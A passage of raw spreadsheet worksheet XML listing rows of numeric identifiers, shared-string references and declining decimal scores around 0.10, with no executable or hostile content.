      <c r="E25063" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25063" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25064" ht="15.75" customHeight="1">
      <c r="A25064" s="1">
        <v>20421.0</v>
      </c>
      <c r="B25064" s="2">
        <v>1.2302413E7</v>
      </c>
      <c r="C25064" s="2" t="s">
        <v>24119</v>
      </c>
      <c r="D25064" s="2">
        <v>1.0</v>
      </c>
      <c r="E25064" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25064" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25065" ht="15.75" customHeight="1">
      <c r="A25065" s="1">
        <v>21078.0</v>
      </c>
      <c r="B25065" s="2">
        <v>1.7994315E7</v>
      </c>
      <c r="C25065" s="2" t="s">
        <v>24120</v>
      </c>
      <c r="D25065" s="2">
        <v>1.0</v>
      </c>
      <c r="E25065" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25065" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25066" ht="15.75" customHeight="1">
      <c r="A25066" s="1">
        <v>21164.0</v>
      </c>
      <c r="B25066" s="2">
        <v>1.9004707E7</v>
      </c>
      <c r="C25066" s="2" t="s">
        <v>24121</v>
      </c>
      <c r="D25066" s="2">
        <v>1.0</v>
      </c>
      <c r="E25066" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25066" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25067" ht="15.75" customHeight="1">
      <c r="A25067" s="1">
        <v>21286.0</v>
      </c>
      <c r="B25067" s="2">
        <v>2.0459133E7</v>
      </c>
      <c r="C25067" s="2" t="s">
        <v>24122</v>
      </c>
      <c r="D25067" s="2">
        <v>1.0</v>
      </c>
      <c r="E25067" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25067" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25068" ht="15.75" customHeight="1">
      <c r="A25068" s="1">
        <v>21449.0</v>
      </c>
      <c r="B25068" s="2">
        <v>2.2560301E7</v>
      </c>
      <c r="C25068" s="2" t="s">
        <v>24123</v>
      </c>
      <c r="D25068" s="2">
        <v>1.0</v>
      </c>
      <c r="E25068" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25068" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25069" ht="15.75" customHeight="1">
      <c r="A25069" s="1">
        <v>21703.0</v>
      </c>
      <c r="B25069" s="2">
        <v>2.5256707E7</v>
      </c>
      <c r="C25069" s="2" t="s">
        <v>24124</v>
      </c>
      <c r="D25069" s="2">
        <v>1.0</v>
      </c>
      <c r="E25069" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25069" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25070" ht="15.75" customHeight="1">
      <c r="A25070" s="1">
        <v>21739.0</v>
      </c>
      <c r="B25070" s="2">
        <v>2.5890083E7</v>
      </c>
      <c r="C25070" s="2" t="s">
        <v>24125</v>
      </c>
      <c r="D25070" s="2">
        <v>1.0</v>
      </c>
      <c r="E25070" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25070" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25071" ht="15.75" customHeight="1">
      <c r="A25071" s="1">
        <v>21951.0</v>
      </c>
      <c r="B25071" s="2">
        <v>2.8874865E7</v>
      </c>
      <c r="C25071" s="2" t="s">
        <v>24126</v>
      </c>
      <c r="D25071" s="2">
        <v>1.0</v>
      </c>
      <c r="E25071" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25071" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25072" ht="15.75" customHeight="1">
      <c r="A25072" s="1">
        <v>22565.0</v>
      </c>
      <c r="B25072" s="2">
        <v>3.8427091E7</v>
      </c>
      <c r="C25072" s="2" t="s">
        <v>24127</v>
      </c>
      <c r="D25072" s="2">
        <v>1.0</v>
      </c>
      <c r="E25072" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25072" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25073" ht="15.75" customHeight="1">
      <c r="A25073" s="1">
        <v>22737.0</v>
      </c>
      <c r="B25073" s="2">
        <v>4.4087445E7</v>
      </c>
      <c r="C25073" s="2" t="s">
        <v>24128</v>
      </c>
      <c r="D25073" s="2">
        <v>1.0</v>
      </c>
      <c r="E25073" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25073" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25074" ht="15.75" customHeight="1">
      <c r="A25074" s="1">
        <v>24077.0</v>
      </c>
      <c r="B25074" s="2">
        <v>9695748.0</v>
      </c>
      <c r="C25074" s="2" t="s">
        <v>24129</v>
      </c>
      <c r="D25074" s="2">
        <v>1.0</v>
      </c>
      <c r="E25074" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25074" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25075" ht="15.75" customHeight="1">
      <c r="A25075" s="1">
        <v>24325.0</v>
      </c>
      <c r="B25075" s="2">
        <v>1.0664112E7</v>
      </c>
      <c r="C25075" s="2" t="s">
        <v>24130</v>
      </c>
      <c r="D25075" s="2">
        <v>1.0</v>
      </c>
      <c r="E25075" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25075" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25076" ht="15.75" customHeight="1">
      <c r="A25076" s="1">
        <v>24364.0</v>
      </c>
      <c r="B25076" s="2">
        <v>1.0740251E7</v>
      </c>
      <c r="C25076" s="2" t="s">
        <v>24117</v>
      </c>
      <c r="D25076" s="2">
        <v>1.0</v>
      </c>
      <c r="E25076" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25076" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25077" ht="15.75" customHeight="1">
      <c r="A25077" s="1">
        <v>24421.0</v>
      </c>
      <c r="B25077" s="2">
        <v>1.0849949E7</v>
      </c>
      <c r="C25077" s="2" t="s">
        <v>24131</v>
      </c>
      <c r="D25077" s="2">
        <v>1.0</v>
      </c>
      <c r="E25077" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25077" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25078" ht="15.75" customHeight="1">
      <c r="A25078" s="1">
        <v>24649.0</v>
      </c>
      <c r="B25078" s="2">
        <v>1.1501569E7</v>
      </c>
      <c r="C25078" s="2" t="s">
        <v>24132</v>
      </c>
      <c r="D25078" s="2">
        <v>1.0</v>
      </c>
      <c r="E25078" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25078" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25079" ht="15.75" customHeight="1">
      <c r="A25079" s="1">
        <v>25886.0</v>
      </c>
      <c r="B25079" s="2">
        <v>1.4972945E7</v>
      </c>
      <c r="C25079" s="2" t="s">
        <v>24133</v>
      </c>
      <c r="D25079" s="2">
        <v>1.0</v>
      </c>
      <c r="E25079" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25079" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25080" ht="15.75" customHeight="1">
      <c r="A25080" s="1">
        <v>26569.0</v>
      </c>
      <c r="B25080" s="2">
        <v>1.784844E7</v>
      </c>
      <c r="C25080" s="2" t="s">
        <v>24134</v>
      </c>
      <c r="D25080" s="2">
        <v>1.0</v>
      </c>
      <c r="E25080" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25080" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25081" ht="15.75" customHeight="1">
      <c r="A25081" s="1">
        <v>26624.0</v>
      </c>
      <c r="B25081" s="2">
        <v>1.8043106E7</v>
      </c>
      <c r="C25081" s="2" t="s">
        <v>24119</v>
      </c>
      <c r="D25081" s="2">
        <v>1.0</v>
      </c>
      <c r="E25081" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25081" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25082" ht="15.75" customHeight="1">
      <c r="A25082" s="1">
        <v>26679.0</v>
      </c>
      <c r="B25082" s="2">
        <v>1.8075693E7</v>
      </c>
      <c r="C25082" s="2" t="s">
        <v>24135</v>
      </c>
      <c r="D25082" s="2">
        <v>1.0</v>
      </c>
      <c r="E25082" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25082" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25083" ht="15.75" customHeight="1">
      <c r="A25083" s="1">
        <v>26905.0</v>
      </c>
      <c r="B25083" s="2">
        <v>1.931955E7</v>
      </c>
      <c r="C25083" s="2" t="s">
        <v>24136</v>
      </c>
      <c r="D25083" s="2">
        <v>1.0</v>
      </c>
      <c r="E25083" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25083" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25084" ht="15.75" customHeight="1">
      <c r="A25084" s="1">
        <v>26986.0</v>
      </c>
      <c r="B25084" s="2">
        <v>1.9756104E7</v>
      </c>
      <c r="C25084" s="2" t="s">
        <v>24137</v>
      </c>
      <c r="D25084" s="2">
        <v>1.0</v>
      </c>
      <c r="E25084" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25084" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25085" ht="15.75" customHeight="1">
      <c r="A25085" s="1">
        <v>27091.0</v>
      </c>
      <c r="B25085" s="2">
        <v>2.0520357E7</v>
      </c>
      <c r="C25085" s="2" t="s">
        <v>24138</v>
      </c>
      <c r="D25085" s="2">
        <v>1.0</v>
      </c>
      <c r="E25085" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25085" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25086" ht="15.75" customHeight="1">
      <c r="A25086" s="1">
        <v>27209.0</v>
      </c>
      <c r="B25086" s="2">
        <v>2.0966486E7</v>
      </c>
      <c r="C25086" s="2" t="s">
        <v>24139</v>
      </c>
      <c r="D25086" s="2">
        <v>1.0</v>
      </c>
      <c r="E25086" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25086" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25087" ht="15.75" customHeight="1">
      <c r="A25087" s="1">
        <v>27232.0</v>
      </c>
      <c r="B25087" s="2">
        <v>2.1047142E7</v>
      </c>
      <c r="C25087" s="2" t="s">
        <v>24140</v>
      </c>
      <c r="D25087" s="2">
        <v>1.0</v>
      </c>
      <c r="E25087" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25087" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25088" ht="15.75" customHeight="1">
      <c r="A25088" s="1">
        <v>27588.0</v>
      </c>
      <c r="B25088" s="2">
        <v>2.25603E7</v>
      </c>
      <c r="C25088" s="2" t="s">
        <v>24123</v>
      </c>
      <c r="D25088" s="2">
        <v>1.0</v>
      </c>
      <c r="E25088" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25088" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25089" ht="15.75" customHeight="1">
      <c r="A25089" s="1">
        <v>27760.0</v>
      </c>
      <c r="B25089" s="2">
        <v>2.3106166E7</v>
      </c>
      <c r="C25089" s="2" t="s">
        <v>24141</v>
      </c>
      <c r="D25089" s="2">
        <v>1.0</v>
      </c>
      <c r="E25089" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25089" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25090" ht="15.75" customHeight="1">
      <c r="A25090" s="1">
        <v>27994.0</v>
      </c>
      <c r="B25090" s="2">
        <v>2.4202799E7</v>
      </c>
      <c r="C25090" s="2" t="s">
        <v>24142</v>
      </c>
      <c r="D25090" s="2">
        <v>1.0</v>
      </c>
      <c r="E25090" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25090" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25091" ht="15.75" customHeight="1">
      <c r="A25091" s="1">
        <v>28079.0</v>
      </c>
      <c r="B25091" s="2">
        <v>2.4628951E7</v>
      </c>
      <c r="C25091" s="2" t="s">
        <v>24143</v>
      </c>
      <c r="D25091" s="2">
        <v>1.0</v>
      </c>
      <c r="E25091" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25091" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25092" ht="15.75" customHeight="1">
      <c r="A25092" s="1">
        <v>28081.0</v>
      </c>
      <c r="B25092" s="2">
        <v>2.4628951E7</v>
      </c>
      <c r="C25092" s="2" t="s">
        <v>24144</v>
      </c>
      <c r="D25092" s="2">
        <v>1.0</v>
      </c>
      <c r="E25092" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25092" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25093" ht="15.75" customHeight="1">
      <c r="A25093" s="1">
        <v>28251.0</v>
      </c>
      <c r="B25093" s="2">
        <v>2.5256706E7</v>
      </c>
      <c r="C25093" s="2" t="s">
        <v>24124</v>
      </c>
      <c r="D25093" s="2">
        <v>1.0</v>
      </c>
      <c r="E25093" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25093" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25094" ht="15.75" customHeight="1">
      <c r="A25094" s="1">
        <v>28831.0</v>
      </c>
      <c r="B25094" s="2">
        <v>2.8874864E7</v>
      </c>
      <c r="C25094" s="2" t="s">
        <v>24145</v>
      </c>
      <c r="D25094" s="2">
        <v>1.0</v>
      </c>
      <c r="E25094" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25094" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25095" ht="15.75" customHeight="1">
      <c r="A25095" s="1">
        <v>29311.0</v>
      </c>
      <c r="B25095" s="2">
        <v>3.1284603E7</v>
      </c>
      <c r="C25095" s="2" t="s">
        <v>24146</v>
      </c>
      <c r="D25095" s="2">
        <v>1.0</v>
      </c>
      <c r="E25095" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25095" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25096" ht="15.75" customHeight="1">
      <c r="A25096" s="1">
        <v>29498.0</v>
      </c>
      <c r="B25096" s="2">
        <v>3.2708302E7</v>
      </c>
      <c r="C25096" s="2" t="s">
        <v>24147</v>
      </c>
      <c r="D25096" s="2">
        <v>1.0</v>
      </c>
      <c r="E25096" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25096" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25097" ht="15.75" customHeight="1">
      <c r="A25097" s="1">
        <v>30230.0</v>
      </c>
      <c r="B25097" s="2">
        <v>3.7432788E7</v>
      </c>
      <c r="C25097" s="2" t="s">
        <v>24148</v>
      </c>
      <c r="D25097" s="2">
        <v>1.0</v>
      </c>
      <c r="E25097" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25097" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25098" ht="15.75" customHeight="1">
      <c r="A25098" s="1">
        <v>30325.0</v>
      </c>
      <c r="B25098" s="2">
        <v>3.8062313E7</v>
      </c>
      <c r="C25098" s="2" t="s">
        <v>24149</v>
      </c>
      <c r="D25098" s="2">
        <v>1.0</v>
      </c>
      <c r="E25098" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25098" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25099" ht="15.75" customHeight="1">
      <c r="A25099" s="1">
        <v>30537.0</v>
      </c>
      <c r="B25099" s="2">
        <v>4.0546339E7</v>
      </c>
      <c r="C25099" s="2" t="s">
        <v>24150</v>
      </c>
      <c r="D25099" s="2">
        <v>1.0</v>
      </c>
      <c r="E25099" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25099" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25100" ht="15.75" customHeight="1">
      <c r="A25100" s="1">
        <v>30982.0</v>
      </c>
      <c r="B25100" s="2">
        <v>4.7524183E7</v>
      </c>
      <c r="C25100" s="2" t="s">
        <v>24151</v>
      </c>
      <c r="D25100" s="2">
        <v>1.0</v>
      </c>
      <c r="E25100" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25100" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25101" ht="15.75" customHeight="1">
      <c r="A25101" s="1">
        <v>31243.0</v>
      </c>
      <c r="B25101" s="2">
        <v>4930690.0</v>
      </c>
      <c r="C25101" s="2" t="s">
        <v>24152</v>
      </c>
      <c r="D25101" s="2">
        <v>1.0</v>
      </c>
      <c r="E25101" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25101" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25102" ht="15.75" customHeight="1">
      <c r="A25102" s="1">
        <v>31359.0</v>
      </c>
      <c r="B25102" s="2">
        <v>4.9871648E7</v>
      </c>
      <c r="C25102" s="2" t="s">
        <v>24153</v>
      </c>
      <c r="D25102" s="2">
        <v>1.0</v>
      </c>
      <c r="E25102" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25102" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25103" ht="15.75" customHeight="1">
      <c r="A25103" s="1">
        <v>31678.0</v>
      </c>
      <c r="B25103" s="2">
        <v>5187255.0</v>
      </c>
      <c r="C25103" s="2" t="s">
        <v>24154</v>
      </c>
      <c r="D25103" s="2">
        <v>1.0</v>
      </c>
      <c r="E25103" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25103" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25104" ht="15.75" customHeight="1">
      <c r="A25104" s="1">
        <v>31700.0</v>
      </c>
      <c r="B25104" s="2">
        <v>5.1976531E7</v>
      </c>
      <c r="C25104" s="2" t="s">
        <v>24155</v>
      </c>
      <c r="D25104" s="2">
        <v>1.0</v>
      </c>
      <c r="E25104" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25104" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25105" ht="15.75" customHeight="1">
      <c r="A25105" s="1">
        <v>32586.0</v>
      </c>
      <c r="B25105" s="2">
        <v>5783815.0</v>
      </c>
      <c r="C25105" s="2" t="s">
        <v>24156</v>
      </c>
      <c r="D25105" s="2">
        <v>1.0</v>
      </c>
      <c r="E25105" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25105" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25106" ht="15.75" customHeight="1">
      <c r="A25106" s="1">
        <v>32834.0</v>
      </c>
      <c r="B25106" s="2">
        <v>6240383.0</v>
      </c>
      <c r="C25106" s="2" t="s">
        <v>24157</v>
      </c>
      <c r="D25106" s="2">
        <v>1.0</v>
      </c>
      <c r="E25106" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25106" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25107" ht="15.75" customHeight="1">
      <c r="A25107" s="1">
        <v>33064.0</v>
      </c>
      <c r="B25107" s="2">
        <v>6832232.0</v>
      </c>
      <c r="C25107" s="2" t="s">
        <v>24158</v>
      </c>
      <c r="D25107" s="2">
        <v>1.0</v>
      </c>
      <c r="E25107" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25107" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25108" ht="15.75" customHeight="1">
      <c r="A25108" s="1">
        <v>33642.0</v>
      </c>
      <c r="B25108" s="2">
        <v>8385893.0</v>
      </c>
      <c r="C25108" s="2" t="s">
        <v>24159</v>
      </c>
      <c r="D25108" s="2">
        <v>1.0</v>
      </c>
      <c r="E25108" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25108" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25109" ht="15.75" customHeight="1">
      <c r="A25109" s="1">
        <v>33701.0</v>
      </c>
      <c r="B25109" s="2">
        <v>8472451.0</v>
      </c>
      <c r="C25109" s="2" t="s">
        <v>24160</v>
      </c>
      <c r="D25109" s="2">
        <v>1.0</v>
      </c>
      <c r="E25109" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25109" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25110" ht="15.75" customHeight="1">
      <c r="A25110" s="1">
        <v>34239.0</v>
      </c>
      <c r="B25110" s="2">
        <v>4730876.0</v>
      </c>
      <c r="C25110" s="2" t="s">
        <v>24161</v>
      </c>
      <c r="D25110" s="2">
        <v>1.0</v>
      </c>
      <c r="E25110" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25110" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25111" ht="15.75" customHeight="1">
      <c r="A25111" s="1">
        <v>13769.0</v>
      </c>
      <c r="B25111" s="2">
        <v>3.6528626E7</v>
      </c>
      <c r="C25111" s="2" t="s">
        <v>24162</v>
      </c>
      <c r="D25111" s="2">
        <v>1.0</v>
      </c>
      <c r="E25111" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25111" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="25112" ht="15.75" customHeight="1">
      <c r="A25112" s="1">
        <v>30527.0</v>
      </c>
      <c r="B25112" s="2">
        <v>4.0317195E7</v>
      </c>
      <c r="C25112" s="2" t="s">
        <v>24163</v>
      </c>
      <c r="D25112" s="2">
        <v>1.0</v>
      </c>
      <c r="E25112" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25112" s="2">
        <v>0.1009259259259259</v>
      </c>
    </row>
    <row r="25113" ht="15.75" customHeight="1">
      <c r="A25113" s="1">
        <v>5311.0</v>
      </c>
      <c r="B25113" s="2">
        <v>4.5270743E7</v>
      </c>
      <c r="C25113" s="2" t="s">
        <v>24164</v>
      </c>
      <c r="D25113" s="2">
        <v>1.0</v>
      </c>
      <c r="E25113" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25113" s="2">
        <v>0.1007532956685499</v>
      </c>
    </row>
    <row r="25114" ht="15.75" customHeight="1">
      <c r="A25114" s="1">
        <v>28173.0</v>
      </c>
      <c r="B25114" s="2">
        <v>2.498212E7</v>
      </c>
      <c r="C25114" s="2" t="s">
        <v>24165</v>
      </c>
      <c r="D25114" s="2">
        <v>1.0</v>
      </c>
      <c r="E25114" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25114" s="2">
        <v>0.1005747126436781</v>
      </c>
    </row>
    <row r="25115" ht="15.75" customHeight="1">
      <c r="A25115" s="1">
        <v>23988.0</v>
      </c>
      <c r="B25115" s="2">
        <v>9151317.0</v>
      </c>
      <c r="C25115" s="2" t="s">
        <v>18374</v>
      </c>
      <c r="D25115" s="2">
        <v>1.0</v>
      </c>
      <c r="E25115" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25115" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="25116" ht="15.75" customHeight="1">
      <c r="A25116" s="1">
        <v>29049.0</v>
      </c>
      <c r="B25116" s="2">
        <v>3.020935E7</v>
      </c>
      <c r="C25116" s="2" t="s">
        <v>24166</v>
      </c>
      <c r="D25116" s="2">
        <v>1.0</v>
      </c>
      <c r="E25116" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25116" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="25117" ht="15.75" customHeight="1">
      <c r="A25117" s="1">
        <v>9267.0</v>
      </c>
      <c r="B25117" s="2">
        <v>5.5491338E7</v>
      </c>
      <c r="C25117" s="2" t="s">
        <v>24167</v>
      </c>
      <c r="D25117" s="2">
        <v>1.0</v>
      </c>
      <c r="E25117" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25117" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="25118" ht="15.75" customHeight="1">
      <c r="A25118" s="1">
        <v>24139.0</v>
      </c>
      <c r="B25118" s="2">
        <v>1.0048763E7</v>
      </c>
      <c r="C25118" s="2" t="s">
        <v>24168</v>
      </c>
      <c r="D25118" s="2">
        <v>1.0</v>
      </c>
      <c r="E25118" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25118" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="25119" ht="15.75" customHeight="1">
      <c r="A25119" s="1">
        <v>10938.0</v>
      </c>
      <c r="B25119" s="2">
        <v>1.700619E7</v>
      </c>
      <c r="C25119" s="2" t="s">
        <v>24169</v>
      </c>
      <c r="D25119" s="2">
        <v>1.0</v>
      </c>
      <c r="E25119" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25119" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="25120" ht="15.75" customHeight="1">
      <c r="A25120" s="1">
        <v>22041.0</v>
      </c>
      <c r="B25120" s="2">
        <v>3.0209351E7</v>
      </c>
      <c r="C25120" s="2" t="s">
        <v>24170</v>
      </c>
      <c r="D25120" s="2">
        <v>1.0</v>
      </c>
      <c r="E25120" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25120" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="25121" ht="15.75" customHeight="1">
      <c r="A25121" s="1">
        <v>26469.0</v>
      </c>
      <c r="B25121" s="2">
        <v>1.7382868E7</v>
      </c>
      <c r="C25121" s="2" t="s">
        <v>15599</v>
      </c>
      <c r="D25121" s="2">
        <v>1.0</v>
      </c>
      <c r="E25121" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25121" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="25122" ht="15.75" customHeight="1">
      <c r="A25122" s="1">
        <v>20882.0</v>
      </c>
      <c r="B25122" s="2">
        <v>1.6083481E7</v>
      </c>
      <c r="C25122" s="2" t="s">
        <v>13297</v>
      </c>
      <c r="D25122" s="2">
        <v>1.0</v>
      </c>
      <c r="E25122" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25122" s="2">
        <v>0.09979423868312756</v>
      </c>
    </row>
    <row r="25123" ht="15.75" customHeight="1">
      <c r="A25123" s="1">
        <v>23168.0</v>
      </c>
      <c r="B25123" s="2">
        <v>5210924.0</v>
      </c>
      <c r="C25123" s="2" t="s">
        <v>23794</v>
      </c>
      <c r="D25123" s="2">
        <v>1.0</v>
      </c>
      <c r="E25123" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25123" s="2">
        <v>0.09979423868312756</v>
      </c>
    </row>
    <row r="25124" ht="15.75" customHeight="1">
      <c r="A25124" s="1">
        <v>5423.0</v>
      </c>
      <c r="B25124" s="2">
        <v>4.5565511E7</v>
      </c>
      <c r="C25124" s="2" t="s">
        <v>24171</v>
      </c>
      <c r="D25124" s="2">
        <v>1.0</v>
      </c>
      <c r="E25124" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25124" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="25125" ht="15.75" customHeight="1">
      <c r="A25125" s="1">
        <v>7053.0</v>
      </c>
      <c r="B25125" s="2">
        <v>5.0188777E7</v>
      </c>
      <c r="C25125" s="2" t="s">
        <v>24172</v>
      </c>
      <c r="D25125" s="2">
        <v>1.0</v>
      </c>
      <c r="E25125" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25125" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="25126" ht="15.75" customHeight="1">
      <c r="A25126" s="1">
        <v>28681.0</v>
      </c>
      <c r="B25126" s="2">
        <v>2.7574067E7</v>
      </c>
      <c r="C25126" s="2" t="s">
        <v>24173</v>
      </c>
      <c r="D25126" s="2">
        <v>1.0</v>
      </c>
      <c r="E25126" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25126" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="25127" ht="15.75" customHeight="1">
      <c r="A25127" s="1">
        <v>32523.0</v>
      </c>
      <c r="B25127" s="2">
        <v>5.7292627E7</v>
      </c>
      <c r="C25127" s="2" t="s">
        <v>24174</v>
      </c>
      <c r="D25127" s="2">
        <v>1.0</v>
      </c>
      <c r="E25127" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25127" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="25128" ht="15.75" customHeight="1">
      <c r="A25128" s="1">
        <v>2500.0</v>
      </c>
      <c r="B25128" s="2">
        <v>3.393992E7</v>
      </c>
      <c r="C25128" s="2" t="s">
        <v>24175</v>
      </c>
      <c r="D25128" s="2">
        <v>1.0</v>
      </c>
      <c r="E25128" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25128" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="25129" ht="15.75" customHeight="1">
      <c r="A25129" s="1">
        <v>7879.0</v>
      </c>
      <c r="B25129" s="2">
        <v>5.2412681E7</v>
      </c>
      <c r="C25129" s="2" t="s">
        <v>24176</v>
      </c>
      <c r="D25129" s="2">
        <v>1.0</v>
      </c>
      <c r="E25129" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25129" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="25130" ht="15.75" customHeight="1">
      <c r="A25130" s="1">
        <v>21729.0</v>
      </c>
      <c r="B25130" s="2">
        <v>2.5702221E7</v>
      </c>
      <c r="C25130" s="2" t="s">
        <v>24177</v>
      </c>
      <c r="D25130" s="2">
        <v>1.0</v>
      </c>
      <c r="E25130" s="3" t="s">
